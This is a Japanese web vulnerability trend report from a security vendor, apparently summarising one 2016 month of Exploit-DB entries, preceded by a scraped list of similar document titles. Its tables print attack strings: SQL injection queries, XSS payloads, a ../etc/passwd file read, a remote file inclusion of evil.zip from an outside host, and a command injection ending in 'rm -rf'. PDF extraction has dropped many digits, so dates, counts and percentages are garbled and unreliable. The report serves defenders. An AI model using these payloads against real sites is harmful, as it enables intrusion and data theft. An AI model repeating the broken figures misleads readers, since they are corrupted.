最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

Similar documents
最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年



最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

初心者にもできるアメブロカスタマイズ新2016.pages

- 2 Copyright (C) All Rights Reserved.

Copyright All Rights Reserved. -2 -!

IPA:セキュアなインターネットサーバー構築に関する調査

Microsoft Word - 最終版 バックせどりismマニュアル .docx

SOC Report

Copyright 2009, SofTek Systems, Inc. All rights reserved.

untitled

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909

1-20*****B

SiteLock操作マニュアル

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

健康保険組合のあゆみ_top

リバースマップ原稿2

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

別添 2 SQL インジェクション ぜい弱性診断で最低限行うべき項目 1 ( ' ( 検索キー )''-- ( 検索キー ) and 'a'='a ( 検索キー ) and 1=1 は最低限 行うこと ) OS コマンドインジェクション 2 (../../../../../../../bin/sle

やよいの顧客管理

弥生給与/やよいの給与計算

弥生 シリーズ

弥生会計 プロフェッショナル/スタンダード/やよいの青色申告

弥生会計/やよいの青色申告

弥生会計 ネットワーク/プロフェッショナル2ユーザー

契約№2020-XXXX


Copyright 2008 NIFTY Corporation All rights reserved. 2

untitled

Microsoft IISのWebDAV認証回避の脆弱性に関する検証レポート

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

WEBシステムのセキュリティ技術

Copyright 2006 KDDI Corporation. All Rights Reserved page1


1000 Copyright(C)2009 All Rights Reserved - 2 -

PowerPoint プレゼンテーション

PowerPoint Presentation

! Copyright 2015 sapoyubi service All Rights Reserved. 2

report03_amanai.pages

report05_sugano.pages

ソフトウェア管理者向け オートデスク サブスクリプションガイド

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

untitled

42

- 2 Copyright (C) All Rights Reserved.

dekiru_asa

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

pex7_manual

SQLインジェクション・ワームに関する現状と推奨する対策案

2

FileMaker Server Getting Started Guide

P. 2 P. 4 P. 5 P. 6 P. 7 P. 8 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P.30 16

how-to-decide-a-title

DC9GUIDEBook.indb

URL AdobeReader Copyright (C) All Rights Reserved.

(c) 2013 TOYOTA DIGITAL CRUISE, INC. All Rights Reserved.

= SaaS型総合決済サービス = 「PGマルチペイメントサービス」のご案内

MEDIA DATA 2011

~ アドレス収集くん ~ セキュリティ対策御説明資料

h1_h4_

Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.


2.2 Reflected XSS 攻撃攻撃者の用意した悪意のあるリンクとターゲットサーバが同じホストである場合の Reflected XSS 攻撃を, 本稿では Reflected XSS 攻撃と呼ぶ. 例えば, サーバ A の target.php に Reflected XSS 脆弱性があった


Flatbed Scanner Unit 201ユーザーマニュアル

目次 1. エグゼクティブサマリー 総合評価 総評 内在するリスク 情報漏洩 サービス妨害 対策指針 早急の対策 恒久的な対

べきでない悪意のあるSQL 文が攻撃者から入力された場合 データベースで実行される前にSQL 文として処理されないよう無効化する必要がありますが ( 図 1 1) 無効化されずにデータベースで実行された場合 データベースの操作が可能となります ( 図 1 2) 本脆弱性を悪用するとデータベース接続ユ

Copyright 2010 Sumitomo Mitsui Banking Corporation. All Rights Reserved.

Solibri Model Checker 9.5 スタードガイド

PPTテンプレート集 ver.1.0

Microsoft PowerPoint - IW2009H1_nri_sakurai.pptx

20 180pixel 180pixel Copyright 2014 Yahoo Japan Corporation. All Rights Reserved.

— intra-martで運用する場合のセキュリティの考え方    

Copyright (C) 2007 noroiya.com.all Rights Reserved. 2


システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind


Drive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査

Transcription:

06.0

最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです 分析された SQL Injection 攻撃は 攻撃難易度の側面では単なる攻撃の成功可否を問うクエリーを使用して攻撃が行われる難易度の低い攻撃が大半でしたが 危険度の側面ではともに高い攻撃でした 該当脆弱性が発見されたソフトウェアを使用する管理者は対象モジュール及びプラグインに入力値検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを行い SQL Injection 攻撃に露出されないよう注意しなければなりません SQL Injection の他 最近になって Code Injection と関連した脆弱性が周期的に現れています PHP Code Injection は SQL Injection と Command Injection に比べ 相対的に危険度が低い脆弱性に属しますが 相変わらず多くの Web サイトが PHP で構成されていて PHP 当該サイトは Code Injection に簡単に露出される可能性があります PHP Code Injection も SQL Injection と同じく ユーザの入力値を厳しく検証して 悪意的なコードが実行されないよう注意しなければなりません. 脆弱性別件数 脆弱性カテゴリ 件数 ローカルファイル挿入 (Local File Inclusion:LFI) コマンドインジェクション (Command Injection) コード インジェクション (Code Injection) RFIリモートファイル挿入 (Remote File Inclusion:RFI) クロスサイトスクリプティング (Cross Site Scripting : XSS) 8 SQL インジェクション (SQL Injection) 5 合計 8 脆弱性別件数 8 5 6 0 8 6 0. 危険度別件数 危険度 件数 割合 早急対応要 7 5% 高 75% 合計 8 00% 危険度別分類 7 早急対応要 高 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 7% 中 % 易 79% 合計 8 00% 攻撃実行の難易度別件数 難 中 易. 主なソフトウェア別脆弱性発生件数ソフトウェア名 Open Audit SeaWell Networks 合計 件数 3 8 主なソフトウェア別脆弱性発生件数 Open Audit 3 SeaWell Networks Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩攻撃実行難易度分類基準難 : 複数の脆弱性を突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名ソフトウェア名 Copyright 06 Penta Security Systems Inc. All rights reserved

日付 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 06-0-0 3950 SQL Injection 易 高 software_add_license.php SQL /software_add_license.php?id=%0and%0=-- Open Audit Open Audit 06-0-0 3950 SQL Injection 易 高 delete_system.php SQL /delete_system.php?pc=%0and%0=-- Open Audit Open Audit 06-0-0 3950 SQL Injection 易 高 /list_viewdef_software_for_system.php?pc=%0and list_viewdef_software_for_sys %0=-- Open Audit Open Audit 05-0-0 3950 SQL Injection 易高 06-0-05 397 XSS 易高 EDB-Report 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です tem.php SQL system_export.php SQL..00 - logincheck.php XSS 脆弱性 /system_export.php?pc=%0and%0=-- Open Audit Open Audit POST /phpipam/site/login/logincheck.php HTTP/. Chrome/6.0.9.75 Safari/535.7..00 06-0-05 397 XSS 易高..00 - logincheck.php XSS 脆弱性 ipamusername=<script>alert("rxss0")</script>&ip ampassword=xxx POST /phpipam/site/login/logincheck.php HTTP/. Chrome/6.0.9.75 Safari/535.7..00 06-0-05 3968 SQL Injection 易高 - manage-profile.php SQL ipamusername=<script>alert("rxss0")</script>&ip ampassword=xxx POST /manage-profile.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 SQL Injection 易高 - registeracc.php SQL Injection 脆弱性 email=' POST /registeracc.php and =-- HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 XSS 易高 - manage-profile.php XSS email=tester%0wics.com' or updatexml(,concat(0x7e,(version())),0) or' POST /manage-profile.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 XSS 易高 - registeracc.php XSS Injection 脆弱性 firstname=wics&lastname=wics&email=<script>alert (document.location)</script>&password=admin&conf POST /registeracc.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-08 390 XSS 易高 WP Symposium Pro Social Network Plugin 5. - wps_usermeta_shortcodes.ph p XSS 脆弱性 firstname=wics&lastname=wics&email=<script>alert ();</script>&password=admin&confirmpassword=a POST /wps_usermeta_shortcodes.php HTTP/. Chrome/6.0.9.75 Safari/535.7 WP Symposium Pro Social Network Plugin 5. wpspro_country="><script>alert("")</script><" Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 06-0- 393 Code Injection 易高 NMS <= 5.3.6.0 - kill.php Code POST /doms/discoveryqueue/kill.php HTTP/. Chrome/6.0.9.75 Safari/535.7 NMS <= 5.3.6.0 06-0- 393 Command Injection 中早急対応要 pids[]=echo phpinfo(); POST /doms/discoveryqueue/kill.php HTTP/. NMS <= 5.3.6.0 - Chrome/6.0.9.75 Safari/535.7 kill.php Command Injection 脆 弱性 NMS <= 5.3.6.0 06-0-5 396 SQL Injection 難早急対応要.xls Bitrix Module 6.5. - _xls_import.php SQL pids[]=python /tmp/sess_ap6kducbetfk9fhcqdnk0be5; rm -rf /bitrix/admin/_xls_import.php?del_prof_real=& xls_profile=%7%0or%0=(select%0load_file(c ONCAT(CHAR(9),CHAR(9),(select%0version()),CH AR(6),CHAR(97),CHAR(6),CHAR(6),CHAR(97),C HAR(99),CHAR(07),CHAR(0),CHAR(),CHAR(6 ),CHAR(99),CHAR(),CHAR(09),CHAR(9),CHAR( 0),CHAR(),CHAR(),CHAR(98),CHAR(97),CH AR())))+--+.xls Bitrix Module 6.5. 06-0-5 396 SQL Injection 難早急対応要.xls Bitrix Module 6.5. - _xls_import_step_.php SQL /admin/_xls_import_step_.php?save_profile=y &make_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%0load_file(concat(char(9),char(9), (select%0version()),char(6),char(97),char(6),char(6),char(97),char(99),char(07),char( 0),CHAR(),CHAR(6),CHAR(99),CHAR(),CHA R(09),CHAR(9),CHAR(0),CHAR(),CHAR(), CHAR(98),CHAR(97),CHAR())))%9+-- +&xls_iblock_section_id=0&xls_identify=0&firstro w=0&titlerow=0&firstcolumn=0&highestcolumn=0& XLS_GLOBALS=0&sku_iblock_id=&cml_link_code= &xls_iblock_section_id_new=0.xls Bitrix Module 6.5. 06-0-8 3966 LFI 易早急対応要 SeaWell Networks Spectrum - configure_manage.php LFI 脆弱性 /configure_manage.php?action=download_config&file =../../../../../../../../../etc/passwd SeaWell Networks SeaWell Networks Spectrum 06-0-8 3963 RFI 易高.0.9 - index.php RFI 脆弱性 POST /index.php?act=admin&adact=skin&seadact=import HTTP/. Chrome/6.0.9.75 Safari/535.7.0.9 folderpath=../&importtype=&weburl=http://hyp3rlin x.altervista.org/evil.zip&filepath=../&uploadtheme=&i mportskin=import 06-0-8 396 XSS 易高.0.9 - index.php XSS 脆弱性 POST /index.php?act=admin&adact=skin&seadact=import HTTP/. Chrome/6.0.9.75 Safari/535.7.0.9 06-0-5 39309 SQL Injection 中早急対応要 fredirect="/><script>alert("xss Booking Calendar /wordpress/wp-admin/adminajax.php?action=cpabc_appointments_check_ipn_veri Contact Form Plugin <=..3 - admin-ajax.php SQL fication&cpabc_ipncheck=&itemnumber=(select * FROM (SELECT(SLEEP(5)))Qmyx) Booking Calendar Contact Form Plugin <=..3 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 06-0-7 393 XSS 易高 WordPress Booking Calendar Contact Form <=.. - admin.php XSS 脆弱性 /wpadmin/admin.php?page=cpabc_appointments&ac=st& chs=utf- 8&ict=%%3E%3Cimg+src%3Dx+onerror%3Dalert %8%9%3E&ics=%%3E%3Cimg+src%3Dx+one rror%3dalert%8%9%3e&scr= WordPress Booking Calendar Contact Form <=.. 06-0-7 39339 SQL Injection 中早急対応要 06-0-7 39339 XSS 易高 06-0-8 39355 RFI 易高 06-0-8 3935 SQL Injection 易高 06-0-9 39385 SQL Injection 中早急対応要 BK Mobile jquery CMS. - gallery.php SQL BK Mobile jquery CMS. - gallery.php XSS 脆弱性 Ramui Web Hosting Directory Script.0 - connection.php RFI 脆弱性 /user/gallery.php?g_name=%7%0union%0all% 0select%0,,3,group_concat%8version%8%9 %9,5--+ /user/gallery.php?g_name=%3cscript%3ealert%8 %XSS%%9%3C/script%3E /gb/include/connection.php?root=http://test.com.inde x.php Ramui Forum Script 9.0 - /gb/include/page.php?pagename=%0and%0=- page.php SQL - r58 - managefiles.php SQL POST /manage-files.php?client_id= HTTP/. Chrome/6.0.9.75 Safari/535.7 BK Mobile jquery CMS. BK Mobile jquery CMS. Ramui Web Hosting Directory Script.0 Ramui Forum Script 9.0 r58 06-0-9 39385 SQL Injection 易高 r58 - clients.php SQL status=0' and 0 union select 0,,'0) or union select POST /clients.php HTTP/. Chrome/6.0.9.75 Safari/535.7 r58 06-0-9 39385 SQL Injection 易高 06-0-9 39385 SQL Injection 易高 r58 - rocess-zipdownload.php SQL Injection 脆弱性 r58 - homelog.php SQL status=' and =-- /rocess-zipdownload.php?file=%7%0and%0=--%0 /home-log.php?action=%7%0and%0=--%0 r58 r58 Copyright 06 Penta Security Systems Inc. All rights reserved